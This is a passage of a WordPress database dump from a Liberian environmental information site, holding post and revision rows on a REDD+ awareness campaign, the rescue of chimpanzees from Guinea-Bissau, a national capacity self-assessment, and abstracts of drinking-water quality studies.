enhancement of forest carbon stocks in developing countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It aims at the implementation of activities by national governments to reduce human pressure on forests that result in greenhouse gas emissions at the national level, but as an interim measure also recognizes sub-national implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The communication campaign aims to essentially address public perception about REDD implementation in Liberia through a range of activities including radio programs, media training, public events at the national and sub-national levels, and high-level stakeholder engagement with high-level policymakers, legislators, and academia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The campaign will cover five (5) counties in the Southeastern priority landscape and two counties in the Northwest priority landscape including a host of national-level engagements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the lead-up to implementing these communication campaign activities, a Liberian consortium comprising four organizations began holding technical working sessions with stakeholders and Project Implementing Entities (PIEs) in early July. The first technical session was organized to have a meeting of the mind and to update the current REDD+ Communication Strategy, the REDD+ Communications Action Plan, and to improve the quality of the current band of REDD messages.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the end of the first technical working session, the partners agreed to collaboratively determine the most practical approach they can build upon to conduct an effective communication campaign.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Like many conservation and forest management concepts, the REDD framework entails exhaustive and detailed steps before a country can attain result-based payment. Liberia transcended the REDD Readiness phase a few years ago and is now at phase two, which ultimately covers implementing national strategies or action plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the implementation of phase two, the FDA through the LFSP is investing in forest-fringed communities by supporting livelihood and enterprise development activities, improving forest governance, and working with public sector entities to improve their capacities to enhance the public policy on the implementation of the REDD framework.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This communication campaign will provide the opportunity for the public to understand the enabling activities and challenges that were endured to get Liberia to phase two, and the level of progress made so far to elevate Liberia to the payment phase.</p>\n<!-- /wp:paragraph -->','FDA & Partners Increase Public Awareness to Fast-track Liberia’s Progress on REDD+','','publish','open','closed','','fda-partners-increase-public-awareness-to-fast-track-liberias-progress-on-redd','','','2022-09-23 12:19:25','2022-09-23 12:19:25','',0,'https://ekmsliberia.info/?p=5134',95,'post','',0),(5135,42,'2022-09-23 12:18:45','2022-09-23 12:18:45','','FDA','','inherit','open','closed','','fda-3','','','2022-09-23 12:18:45','2022-09-23 12:18:45','',5134,'https://ekmsliberia.info/wp-content/uploads/2022/09/FDA.jpg',0,'attachment','image/jpeg',0),(5136,42,'2022-09-23 12:19:23','2022-09-23 12:19:23','<!-- wp:paragraph -->\n<p>The Forestry Development Authority (FDA) through the Liberia Forest Sector Project (LFSP) has embarked on a communication campaign to increase public awareness about the REDD+ and to communicate some of the key milestones of the project since its inception five years ago.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>REDD stands for Reduced Emission from Deforestation and Degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is a framework created by the United Nations Conference of the Parties (<a href=\"https://unfccc.int/process/bodies/supreme-bodies/conference-of-the-parties-cop\">COP</a>) to guide activities in the forestry sector on the sustainable management of forests and the conservation and enhancement of forest carbon stocks in developing countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It aims at the implementation of activities by national governments to reduce human pressure on forests that result in greenhouse gas emissions at the national level, but as an interim measure also recognizes sub-national implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The communication campaign aims to essentially address public perception about REDD implementation in Liberia through a range of activities including radio programs, media training, public events at the national and sub-national levels, and high-level stakeholder engagement with high-level policymakers, legislators, and academia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The campaign will cover five (5) counties in the Southeastern priority landscape and two counties in the Northwest priority landscape including a host of national-level engagements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the lead-up to implementing these communication campaign activities, a Liberian consortium comprising four organizations began holding technical working sessions with stakeholders and Project Implementing Entities (PIEs) in early July. The first technical session was organized to have a meeting of the mind and to update the current REDD+ Communication Strategy, the REDD+ Communications Action Plan, and to improve the quality of the current band of REDD messages.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the end of the first technical working session, the partners agreed to collaboratively determine the most practical approach they can build upon to conduct an effective communication campaign.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Like many conservation and forest management concepts, the REDD framework entails exhaustive and detailed steps before a country can attain result-based payment. Liberia transcended the REDD Readiness phase a few years ago and is now at phase two, which ultimately covers implementing national strategies or action plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the implementation of phase two, the FDA through the LFSP is investing in forest-fringed communities by supporting livelihood and enterprise development activities, improving forest governance, and working with public sector entities to improve their capacities to enhance the public policy on the implementation of the REDD framework.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This communication campaign will provide the opportunity for the public to understand the enabling activities and challenges that were endured to get Liberia to phase two, and the level of progress made so far to elevate Liberia to the payment phase.</p>\n<!-- /wp:paragraph -->','FDA & Partners Increase Public Awareness to Fast-track Liberia’s Progress on REDD+','','inherit','closed','closed','','5134-revision-v1','','','2022-09-23 12:19:23','2022-09-23 12:19:23','',5134,'https://ekmsliberia.info/?p=5136',0,'revision','',0),(5137,42,'2022-07-15 12:20:00','2022-07-15 12:20:00','<!-- wp:paragraph -->\n<p>Authorities of the Forestry Development Authority (FDA) and Liberia Chimpanzee Rescue &amp; Protection (LCRP) over the weekend received four chimpanzees rescued by the government of Guinea Bissau. This gesture speaks to the effectiveness of West Africa’s regional conservation network. The four chimpanzees will join their Liberian cousins at LCRP’s Sanctuary and Conservation Center in Charlesville, Margibi County to share the care, warmth, and privileges currently being offered to over eighty other chimpanzees, rescued from the illegal bush meat and pet trades.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This groundbreaking initiative was made possible by the governments of Liberia and Guinea-Bissau along with many key partners including Liberia Chimpanzee Rescue &amp; Protection, Pan African Sanctuary Alliance, Born Free Foundation, the Jane Goodall Institute, and the organization most critical to the operation, DHL Africa, who carried the precious cargo across West Africa and transported them all the way to LCRP to ensure they were safe and sound.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>FDA and LCRP authorities passionately embraced&nbsp;the gesture and acknowledged the Guinea Bissau government for its good work. FDA Managing Director C. Mike Doryen termed the gesture as timely and another critical step in supporting the conservation dream of President George Weah-led government. He assured that given the tremendous dedication of LCRP in caring for rescued chimpanzees, their rescued colleagues from neighboring Guinea Bissau will be given maximum care and attention as is the case with their Liberian counterparts. C. Mike Doryen lauded the operation as a symbol of Liberia’s commitment to leading the charge in combating wildlife crime and stopping the killing of chimpanzees. For her part, LCRP Founder and Executive Director Jenny Desmond thanked the FDA, the government of Liberia, and partners and described the gesture as a ‘dream come true. She reiterated LCRP’s unrelenting drive to ensure that rescued chimpanzees are given lifetime care and dignity and most important work to ensure that chimpanzees remain in the wild with their own families.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Chimpanzees, a critically endangered species, are protected in both countries, and it is illegal to harm or keep them. Every chimpanzee LCRP receives has witnessed the murder of his/her mother and family. An estimated ten adult chimpanzees are killed for every orphan who arrives at LCRP, the adults becoming bushmeat, the babies intended to be sold as pets. This marks the first time western chimpanzees have been able to be relocated within their home region, preserving their unique culture and characteristics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Since LCRP’s Sanctuary and Conservation Center’s inauguration on May 28, 2021, FDA and LCRP have worked hand in hand to stop the illegal trade in chimpanzees and other protected wildlife. Characterized as a milestone project in the history of the nation’s conservation drive, LCRP’s Sanctuary and Conservation Center is the result of sustained collaborative efforts of LCRP, the FDA, and many key partners and supporters from both in and outside of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Founded in 2016, LCRP is Liberia’s premier rescuer and protector of chimpanzees from the clutches of illegal bush meat and pet traders. The organization collaborates with local and international partners and government agencies fighting wildlife crime and promoting conservation, such as the FDA, to care for rescued chimpanzees while developing long-term strategies to combat the illegal trade and assure the conservation of chimpanzees, and other wildlife species, set aside by law to be protected consistent with national and international protocols and conventions.</em></p>\n<!-- /wp:paragraph -->','Liberia Welcomes Four Chimpanzees Rescued by Guinea-Bissau - GoL, FDA, and LCRP Provide Sanctuary for New Arrivals','','publish','open','closed','','liberia-welcomes-four-chimpanzees-rescued-by-guinea-bissau-gol-fda-and-lcrp-provide-sanctuary-for-new-arrivals','','','2022-09-23 12:22:48','2022-09-23 12:22:48','',0,'https://ekmsliberia.info/?p=5137',94,'post','',0),(5138,42,'2022-09-23 12:22:27','2022-09-23 12:22:27','','FDA','','inherit','open','closed','','fda-4','','','2022-09-23 12:22:27','2022-09-23 12:22:27','',5137,'https://ekmsliberia.info/wp-content/uploads/2022/09/FDA-1.jpg',0,'attachment','image/jpeg',0),(5139,42,'2022-09-23 12:22:46','2022-09-23 12:22:46','<!-- wp:paragraph -->\n<p>Authorities of the Forestry Development Authority (FDA) and Liberia Chimpanzee Rescue &amp; Protection (LCRP) over the weekend received four chimpanzees rescued by the government of Guinea Bissau. This gesture speaks to the effectiveness of West Africa’s regional conservation network. The four chimpanzees will join their Liberian cousins at LCRP’s Sanctuary and Conservation Center in Charlesville, Margibi County to share the care, warmth, and privileges currently being offered to over eighty other chimpanzees, rescued from the illegal bush meat and pet trades.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This groundbreaking initiative was made possible by the governments of Liberia and Guinea-Bissau along with many key partners including Liberia Chimpanzee Rescue &amp; Protection, Pan African Sanctuary Alliance, Born Free Foundation, the Jane Goodall Institute, and the organization most critical to the operation, DHL Africa, who carried the precious cargo across West Africa and transported them all the way to LCRP to ensure they were safe and sound.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>FDA and LCRP authorities passionately embraced&nbsp;the gesture and acknowledged the Guinea Bissau government for its good work. FDA Managing Director C. Mike Doryen termed the gesture as timely and another critical step in supporting the conservation dream of President George Weah-led government. He assured that given the tremendous dedication of LCRP in caring for rescued chimpanzees, their rescued colleagues from neighboring Guinea Bissau will be given maximum care and attention as is the case with their Liberian counterparts. C. Mike Doryen lauded the operation as a symbol of Liberia’s commitment to leading the charge in combating wildlife crime and stopping the killing of chimpanzees. For her part, LCRP Founder and Executive Director Jenny Desmond thanked the FDA, the government of Liberia, and partners and described the gesture as a ‘dream come true. She reiterated LCRP’s unrelenting drive to ensure that rescued chimpanzees are given lifetime care and dignity and most important work to ensure that chimpanzees remain in the wild with their own families.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Chimpanzees, a critically endangered species, are protected in both countries, and it is illegal to harm or keep them. Every chimpanzee LCRP receives has witnessed the murder of his/her mother and family. An estimated ten adult chimpanzees are killed for every orphan who arrives at LCRP, the adults becoming bushmeat, the babies intended to be sold as pets. This marks the first time western chimpanzees have been able to be relocated within their home region, preserving their unique culture and characteristics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Since LCRP’s Sanctuary and Conservation Center’s inauguration on May 28, 2021, FDA and LCRP have worked hand in hand to stop the illegal trade in chimpanzees and other protected wildlife. Characterized as a milestone project in the history of the nation’s conservation drive, LCRP’s Sanctuary and Conservation Center is the result of sustained collaborative efforts of LCRP, the FDA, and many key partners and supporters from both in and outside of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Founded in 2016, LCRP is Liberia’s premier rescuer and protector of chimpanzees from the clutches of illegal bush meat and pet traders. The organization collaborates with local and international partners and government agencies fighting wildlife crime and promoting conservation, such as the FDA, to care for rescued chimpanzees while developing long-term strategies to combat the illegal trade and assure the conservation of chimpanzees, and other wildlife species, set aside by law to be protected consistent with national and international protocols and conventions.</em></p>\n<!-- /wp:paragraph -->','Liberia Welcomes Four Chimpanzees Rescued by Guinea-Bissau - GoL, FDA, and LCRP Provide Sanctuary for New Arrivals','','inherit','closed','closed','','5137-revision-v1','','','2022-09-23 12:22:46','2022-09-23 12:22:46','',5137,'https://ekmsliberia.info/?p=5139',0,'revision','',0),(5140,42,'2022-09-26 11:24:57','2022-09-26 11:24:57','<span id=\"page39R_mcid6\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">This updated National Capacity Self</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">Assessment draws from two major interventions. First, a </span><span dir=\"ltr\" role=\"presentation\">National Capacity Self</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">Assessment was conducted in 2006. The proces</span><span dir=\"ltr\" role=\"presentation\">s identified a list of </span><span dir=\"ltr\" role=\"presentation\">capacity gaps that could hinder or limit the country\'s ability to attain obligations of the Rio </span><span dir=\"ltr\" role=\"presentation\">Conventions. As a result of such initiatives, the country has been working with its partners to close </span><span dir=\"ltr\" role=\"presentation\">some of the capacity gaps listed in</span> <span dir=\"ltr\" role=\"presentation\">the 2006 NCSA. Second, the United Nations Development </span><span dir=\"ltr\" role=\"presentation\">Programme (UNDP) has been working with the Liberian government through the EPA to </span><span dir=\"ltr\" role=\"presentation\">implement the Cross</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">Cutting Capacity Development (CCCD) project, which is funded by the </span><span dir=\"ltr\" role=\"presentation\">Global Environmental Facility (</span><span dir=\"ltr\" role=\"presentation\">GEF). The four</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">year project had the goal of helping Liberia to </span><span dir=\"ltr\" role=\"presentation\">make better decisions to meet and sustain global environmental obligations. Such a goal required </span><span dir=\"ltr\" role=\"presentation\">the country to have the capacity to coordinate efforts, as well as best practices for integratin</span><span dir=\"ltr\" role=\"presentation\">g global </span><span dir=\"ltr\" role=\"presentation\">environmental priorities into planning, decision</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">making, and reporting processes.</span> <span dir=\"ltr\" role=\"presentation\">Accordingly,</span> <span dir=\"ltr\" role=\"presentation\">the </span><span dir=\"ltr\" role=\"presentation\">project aimed to strengthen a targeted set of national capacities to deliver and sustain global</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">environmental outcomes within the framework of susta</span><span dir=\"ltr\" role=\"presentation\">inable development priorities.</span></span>','Liberia\'s 2022 Updated National Capacity Self Assessment Report','','publish','closed','closed','','liberias-2022-updated-national-capacity-self-assessment-report','','','2022-09-26 11:24:57','2022-09-26 11:24:57','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5140',31,'document','',0),(5141,42,'2022-09-26 11:19:51','2022-09-26 11:19:51','','Final Report NCSA-lIBERIA','','inherit','open','closed','','final-report-ncsa-liberia','','','2022-09-26 11:24:57','2022-09-26 11:24:57','',5140,'https://ekmsliberia.info/wp-content/uploads/2022/09/Final-Report-NCSA-lIBERIA.pdf',0,'attachment','application/pdf',0),(5143,42,'2022-09-26 11:23:46','2022-09-26 11:23:46','','Screenshot 2022-09-26 at 11-20-30 Final Report NCSA-lIBERIA.pdf','','inherit','open','closed','','screenshot-2022-09-26-at-11-20-30-final-report-ncsa-liberia-pdf','','','2022-09-26 11:23:46','2022-09-26 11:23:46','',5140,'https://ekmsliberia.info/wp-content/uploads/2022/09/Screenshot-2022-09-26-at-11-20-30-Final-Report-NCSA-lIBERIA.pdf.png',0,'attachment','image/png',0),(5144,42,'2022-09-26 11:24:57','2022-09-26 11:24:57','<span id=\"page39R_mcid6\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">This updated National Capacity Self</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">Assessment draws from two major interventions. First, a </span><span dir=\"ltr\" role=\"presentation\">National Capacity Self</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">Assessment was conducted in 2006. The proces</span><span dir=\"ltr\" role=\"presentation\">s identified a list of </span><span dir=\"ltr\" role=\"presentation\">capacity gaps that could hinder or limit the country\'s ability to attain obligations of the Rio </span><span dir=\"ltr\" role=\"presentation\">Conventions. As a result of such initiatives, the country has been working with its partners to close </span><span dir=\"ltr\" role=\"presentation\">some of the capacity gaps listed in</span> <span dir=\"ltr\" role=\"presentation\">the 2006 NCSA. Second, the United Nations Development </span><span dir=\"ltr\" role=\"presentation\">Programme (UNDP) has been working with the Liberian government through the EPA to </span><span dir=\"ltr\" role=\"presentation\">implement the Cross</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">Cutting Capacity Development (CCCD) project, which is funded by the </span><span dir=\"ltr\" role=\"presentation\">Global Environmental Facility (</span><span dir=\"ltr\" role=\"presentation\">GEF). The four</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">year project had the goal of helping Liberia to </span><span dir=\"ltr\" role=\"presentation\">make better decisions to meet and sustain global environmental obligations. Such a goal required </span><span dir=\"ltr\" role=\"presentation\">the country to have the capacity to coordinate efforts, as well as best practices for integratin</span><span dir=\"ltr\" role=\"presentation\">g global </span><span dir=\"ltr\" role=\"presentation\">environmental priorities into planning, decision</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">making, and reporting processes.</span> <span dir=\"ltr\" role=\"presentation\">Accordingly,</span> <span dir=\"ltr\" role=\"presentation\">the </span><span dir=\"ltr\" role=\"presentation\">project aimed to strengthen a targeted set of national capacities to deliver and sustain global</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">environmental outcomes within the framework of susta</span><span dir=\"ltr\" role=\"presentation\">inable development priorities.</span></span>','Liberia\'s 2022 Updated National Capacity Self Assessment Report','','inherit','closed','closed','','5140-revision-v1','','','2022-09-26 11:24:57','2022-09-26 11:24:57','',5140,'https://ekmsliberia.info/?p=5144',0,'revision','',0),(5146,42,'2022-10-11 11:03:51','2022-10-11 11:03:51','Access to safe drinking water is a daunting challenge for most residents of sub-Saharan Africa, especially West Africa. Liberia being a West African nation, the availability of safe drinking water is a very serious issue in the water and sanitation and health sector. Montserrado County, one of the political sub-division of Liberia in which the capital, Monrovia, is located has been experiencing serious problem with safe drinking. Residents are often compelled to obtain drinking water from several sources including hand-dug wells, bore-holes, public water supply\r\nand even local streams. In this study, the physical and chemical quality of four drinking water sources, used by residents of Cotton Tree Community located on the Robert’s international Airport high way, were assessed to determine their safety for human consumption.','Analysis of Selected Physical & Chemical Parameters in Drinking Water Samples Collected from Cotton Tree Community','','publish','closed','closed','','analysis-of-selected-physical-chemical-parameters-in-drinking-water-samples-collected-from-cotton-tree-community','','','2022-10-11 11:03:51','2022-10-11 11:03:51','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5146',30,'document','',0),(5147,42,'2022-10-11 10:55:57','2022-10-11 10:55:57','','AnalysisofSelectedP..','','inherit','open','closed','','analysisofselectedp','','','2022-10-11 11:03:51','2022-10-11 11:03:51','',5146,'https://ekmsliberia.info/wp-content/uploads/2022/10/AnalysisofSelectedP...pdf',0,'attachment','application/pdf',0),(5148,42,'2022-10-11 10:56:09','2022-10-11 10:56:09','','GlobalJournalforResearchAnalysis_','','inherit','open','closed','','globaljournalforresearchanalysis_','','','2022-10-12 11:04:49','2022-10-12 11:04:49','',5153,'https://ekmsliberia.info/wp-content/uploads/2022/10/GlobalJournalforResearchAnalysis_.pdf',0,'attachment','application/pdf',0),(5149,42,'2022-10-11 10:56:14','2022-10-11 10:56:14','','Physiochemical_and_bacteriological_analyses_of_sel','','inherit','open','closed','','physiochemical_and_bacteriological_analyses_of_sel','','','2022-10-11 10:56:14','2022-10-11 10:56:14','',0,'https://ekmsliberia.info/wp-content/uploads/2022/10/Physiochemical_and_bacteriological_analyses_of_sel.pdf',0,'attachment','application/pdf',0),(5150,42,'2022-10-11 10:58:58','2022-10-11 10:58:58','','Untitled','','inherit','open','closed','','untitled-18','','','2022-10-11 10:58:58','2022-10-11 10:58:58','',5146,'https://ekmsliberia.info/wp-content/uploads/2022/10/Untitled.png',0,'attachment','image/png',0),(5151,42,'2022-10-11 11:03:51','2022-10-11 11:03:51','Access to safe drinking water is a daunting challenge for most residents of sub-Saharan Africa, especially West Africa. Liberia being a West African nation, the availability of safe drinking water is a very serious issue in the water and sanitation and health sector. Montserrado County, one of the political sub-division of Liberia in which the capital, Monrovia, is located has been experiencing serious problem with safe drinking. Residents are often compelled to obtain drinking water from several sources including hand-dug wells, bore-holes, public water supply\r\nand even local streams. In this study, the physical and chemical quality of four drinking water sources, used by residents of Cotton Tree Community located on the Robert’s international Airport high way, were assessed to determine their safety for human consumption.','Analysis of Selected Physical & Chemical Parameters in Drinking Water Samples Collected from Cotton Tree Community','','inherit','closed','closed','','5146-revision-v1','','','2022-10-11 11:03:51','2022-10-11 11:03:51','',5146,'https://ekmsliberia.info/?p=5151',0,'revision','',0),(5153,42,'2022-10-12 11:04:49','2022-10-12 11:04:49','The discharge of effluent from septic systems into unsaturated zones creates threats to the physical environment that may result to ground water contamination depending on a number of factors including soil hydraulic conductivity, depth of water table and proximity of a septic system to borehole. Infiltration of septic waste into ground water may result into the transfer of disease causing microorganisms that may impact the environment and health of nearby receptors. The current study sought to determine contaminant levels in the samples and enumerate the impact caused by the construction of septic tanks in close proximity to ground water sources in Kesselly Boulevard community, Liberia. Water samples were collected in triplicates from five sampling points (four wells and one hand pump) and transported to the\r\nEnvironmental Protection Agency Laboratory for analysis. PH, nitrate and nitrite levels were analyzed in the samples using spectrophotometry employing a DR 890 Colorimeter (Hach). Lead levels were analyzed using a DR 5000 Spectrophotometer (Hach). Bacteriological (E. coli &amp; Fecal Coliform) analysis were done using Palin-test Kit (Hach) while turbidity levels were enumerated using a Turbidity Meter T-100 (Oakton). Furthermore, microbiological isolates were identified using API 20E assay.','Impact of Constructing Septic Tanks in Close Proximity to Boreholes (Ground Water): The Case of Kesselly Boulevard Community in Montserrado County, Liberia','','publish','closed','closed','','impact-of-constructing-septic-tanks-in-close-proximity-to-boreholes-ground-water-the-case-of-kesselly-boulevard-community-in-montserrado-county-liberia','','','2022-10-12 11:04:49','2022-10-12 11:04:49','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5153',29,'document','',0),(5154,42,'2022-10-12 10:59:39','2022-10-12 10:59:39','','Untitled','','inherit','open','closed','','untitled-19','','','2022-10-12 10:59:39','2022-10-12 10:59:39','',5153,'https://ekmsliberia.info/wp-content/uploads/2022/10/Untitled-1.png',0,'attachment','image/png',0),(5155,42,'2022-10-12 11:04:49','2022-10-12 11:04:49','The discharge of effluent from septic systems into unsaturated zones creates threats to the physical environment that may result to ground water contamination depending on a number of factors including soil hydraulic conductivity, depth of water table and proximity of a septic system to borehole. Infiltration of septic waste into ground water may result into the transfer of disease causing microorganisms that may impact the environment and health of nearby receptors. The current study sought to determine contaminant levels in the samples and enumerate the impact caused by the construction of septic tanks in close proximity to ground water sources in Kesselly Boulevard community, Liberia. Water samples were collected in triplicates from five sampling points (four wells and one hand pump) and transported to the\r\nEnvironmental Protection Agency Laboratory for analysis. PH, nitrate and nitrite levels were analyzed in the samples using spectrophotometry employing a DR 890 Colorimeter (Hach). Lead levels were analyzed using a DR 5000 Spectrophotometer (Hach). Bacteriological (E. coli &amp; Fecal Coliform) analysis were done using Palin-test Kit (Hach) while turbidity levels were enumerated using a Turbidity Meter T-100 (Oakton). Furthermore, microbiological isolates were identified using API 20E assay.','Impact of Constructing Septic Tanks in Close Proximity to Boreholes (Ground Water): The Case of Kesselly Boulevard Community in Montserrado County, Liberia','','inherit','closed','closed','','5153-revision-v1','','','2022-10-12 11:04:49','2022-10-12 11:04:49','',5153,'https://ekmsliberia.info/?p=5155',0,'revision','',0),(5157,42,'2022-10-12 11:12:21','2022-10-12 11:12:21','In developing nations of the world 80% of all diseases and over 30% of death are related to drinking water. Drinking water may become\r\ncontaminated during collection, handling, storage and use. Since the introduction of factory based water, their consumption have increased severely in Liberia. Therefore, it is essential to investigate the physiochemical and bacteriological parameters of sachet water brands sold in Central Monrovia in order to ascertain whether they conform to recommended standards of portable drinking-water by the World Health Organization (WHO). This study made used of random sampling. Six samples of seven brands of sachet water were purchased randomly from provision shops. The samples were transported to the National Standards Laboratory for physiochemical and bacteriological analyses. Physiochemical parameters such as calcium, fluoride, iron, lead, turbidity and pH were checked, while Total Viable Count, coliform, and Escherichia were checked as bacteriological parameters.','Physiochemical and Bacteriological Analyses of Selected Sachet Water in Central Monrovia, Liberia','','publish','closed','closed','','physiochemical-and-bacteriological-analyses-of-selected-sachet-water-in-central-monrovia-liberia','','','2022-10-12 11:12:21','2022-10-12 11:12:21','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5157',28,'document','',0),(5158,42,'2022-10-12 11:10:10','2022-10-12 11:10:10','','Untitled','','inherit','open','closed','','untitled-20','','','2022-10-12 11:10:10','2022-10-12 11:10:10','',5157,'https://ekmsliberia.info/wp-content/uploads/2022/10/Untitled-2.png',0,'attachment','image/png',0),(5159,42,'2022-10-12 11:12:21','2022-10-12 11:12:21','In developing nations of the world 80% of all diseases and over 30% of death are related to drinking water. Drinking water may become\r\ncontaminated during collection, handling, storage and use. Since the introduction of factory based water, their consumption have increased severely in Liberia. Therefore, it is essential to investigate the physiochemical and bacteriological parameters of sachet water brands sold in Central Monrovia in order to ascertain whether they conform to recommended standards of portable drinking-water by the World Health Organization (WHO). This study made used of random sampling. Six samples of seven brands of sachet water were purchased randomly from provision shops. The samples were transported to the National Standards Laboratory for physiochemical and bacteriological analyses. Physiochemical parameters such as calcium, fluoride, iron, lead, turbidity and pH were checked, while Total Viable Count, coliform, and Escherichia were checked as bacteriological parameters.','Physiochemical and Bacteriological Analyses of Selected Sachet Water in Central Monrovia, Liberia','','inherit','closed','closed','','5157-revision-v1','','','2022-10-12 11:12:21','2022-10-12 11:12:21','',5157,'https://ekmsliberia.info/?p=5159',0,'revision','',0),(5163,42,'2022-10-12 16:16:44','2022-10-12 16:16:44','<span class=\"ILfuVd\" lang=\"en\"><span class=\"hgKElc\">The NDMA is responsible to provide overall direction for integrating <span tabindex=\"0\" role=\"tooltip\"><span class=\"povykd\" tabindex=\"0\" role=\"button\" data-enable-toggle-animation=\"true\" data-extra-container-classes=\"ZLo7Eb\" data-hover-hide-delay=\"1000\" data-hover-open-delay=\"500\" data-send-open-event=\"true\" data-theme=\"0\" data-width=\"250\" data-ved=\"2ahUKEwjM-pbdi9v6AhUJWcAKHep8ASUQmpgGegQIEBAD\"><span class=\"JPfdse\" data-bubble-link=\"\" data-segment-text=\"disaster risk reduction\">disaster risk reduction</span></span></span> into development, recovery and humanitarian response policy and plans; to contribute to national risk management applications for sustainable national development; and to strengthen disaster preparedness for effective emergency and recovery response.</span></span>','National Disaster Management Agency of Liberia','','publish','closed','closed','','national-disaster-management-agency-of-liberia','','','2022-10-12 16:18:38','2022-10-12 16:18:38','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=5163',1,'institution','',0),(5164,42,'2022-10-12 16:12:20','2022-10-12 16:12:20','','ndma','','inherit','open','closed','','ndma','','','2022-10-12 16:18:38','2022-10-12 16:18:38','',5163,'https://ekmsliberia.info/wp-content/uploads/2022/10/ndma.jpg',0,'attachment','image/jpeg',0),(5165,42,'2022-10-12 16:16:08','2022-10-12 16:16:08','','ndma','','inherit','open','closed','','ndma-2','','','2022-10-12 16:16:08','2022-10-12 16:16:08','',5163,'https://ekmsliberia.info/wp-content/uploads/2022/10/ndma-1.jpg',0,'attachment','image/jpeg',0),(5166,42,'2022-10-12 16:16:44','2022-10-12 16:16:44','','National Disaster Management Agency of Liberia','','inherit','closed','closed','','5163-revision-v1','','','2022-10-12 16:16:44','2022-10-12 16:16:44','',5163,'https://ekmsliberia.info/?p=5166',0,'revision','',0),(5167,42,'2022-10-12 16:18:22','2022-10-12 16:18:22','<span class=\"ILfuVd\" lang=\"en\"><span class=\"hgKElc\">The NDMA is responsible To provide overall direction for integrating <span tabindex=\"0\" role=\"tooltip\"><span class=\"povykd\" tabindex=\"0\" role=\"button\" data-enable-toggle-animation=\"true\" data-extra-container-classes=\"ZLo7Eb\" data-hover-hide-delay=\"1000\" data-hover-open-delay=\"500\" data-send-open-event=\"true\" data-theme=\"0\" data-width=\"250\" data-ved=\"2ahUKEwjM-pbdi9v6AhUJWcAKHep8ASUQmpgGegQIEBAD\"><span class=\"JPfdse\" data-bubble-link=\"\" data-segment-text=\"disaster risk reduction\">disaster risk reduction</span></span></span> into development, recovery and humanitarian response policy and plans; To contribute to national risk management applications for sustainable national development; and. To strengthen disaster preparedness for effective emergency and recovery response.</span></span>','National Disaster Management Agency of Liberia','','inherit','closed','closed','','5163-autosave-v1','','','2022-10-12 16:18:22','2022-10-12 16:18:22','',5163,'https://ekmsliberia.info/?p=5167',0,'revision','',0),(5168,42,'2022-10-12 16:18:38','2022-10-12 16:18:38','<span class=\"ILfuVd\" lang=\"en\"><span class=\"hgKElc\">The NDMA is responsible to provide overall direction for integrating <span tabindex=\"0\" role=\"tooltip\"><span class=\"povykd\" tabindex=\"0\" role=\"button\" data-enable-toggle-animation=\"true\" data-extra-container-classes=\"ZLo7Eb\" data-hover-hide-delay=\"1000\" data-hover-open-delay=\"500\" data-send-open-event=\"true\" data-theme=\"0\" data-width=\"250\" data-ved=\"2ahUKEwjM-pbdi9v6AhUJWcAKHep8ASUQmpgGegQIEBAD\"><span class=\"JPfdse\" 